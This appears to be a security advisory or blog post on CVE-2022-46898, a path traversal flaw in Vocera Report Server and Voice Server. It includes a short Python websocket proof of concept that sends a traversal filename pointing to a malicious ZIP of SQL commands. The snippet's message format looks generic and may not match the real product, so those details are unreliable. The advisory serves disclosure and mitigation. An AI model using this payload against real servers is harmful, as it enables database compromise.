CVE-2022-46898 - Path Traversal Vulnerability in Vocera Report Server and Voice Server 5.x through 5.8

A significant security vulnerability has been discovered in the Vocera Report Server and Voice Server versions 5.x through 5.8. This vulnerability, labeled as CVE-2022-46898, is related to path traversal via the "restore SQL data" filename. The issue stems from a lack of proper input validation, which allows a potential attacker to execute malicious SQL commands against the database by pointing to a specifically crafted ZIP archive.

Details

The Vocera Report Console, a component of the affected software, includes a websocket function to restore the database from a ZIP archive containing an SQL import file. However, the filename given to the function is not properly sanitized, allowing an attacker to include a path-traversal payload to escape the intended restoration directory.

An example of the vulnerability in action can be seen in this code snippet

import websocket
import json

ws = websocket.WebSocket()

# Establish a connection to the Vocera Report Console websocket
ws.connect("ws://example.com/report-console")

# Prepare the malicious ZIP archive payload with path traversal
path_traversal_payload = "../../../../../../path/to/malicious/archive.zip"

# Send the "restore SQL data" command with the path traversal payload
restore_command = {
    "action": "restore",
    "data": {"filename": path_traversal_payload}
}

ws.send(json.dumps(restore_command))

The above code snippet demonstrates an attack against the Vocera Report Server, where the attacker connects to the websocket and sends a payload containing a path traversal filename pointing to a malicious ZIP archive. This archive contains crafted SQL commands that, when executed as part of the restoration process, could compromise the database server.

Mitigation

In order to fix this vulnerability, it is crucial for Vocera to implement proper input validation and sanitization for the "restore SQL data" filename to avoid allowing attackers to manipulate the expected behavior. Moreover, it is recommended that affected users update their Vocera Report Server and Voice Server installations to the latest version once a security patch addressing this issue is released.

For more information on this vulnerability, you may refer to the links below

- Vocera Report Server: [https://www.vocera.com/products/report-server]
- Vocera Voice Server: [https://www.vocera.com/products/voice-server]
- CVE-2022-46898 Details: [https://nvd.nist.gov/vuln/detail/CVE-2022-46898]
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): [https://cwe.mitre.org/data/definitions/22.html]

Conclusion

CVE-2022-46898 is a critical vulnerability, as it can lead to the compromise of both the Vocera Report Server and Voice Server databases if exploited successfully. It is of utmost importance to ensure that the affected software installations are updated regularly to prevent such security incidents and maintain the overall security and reliability of the systems.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 01:21:00 UTC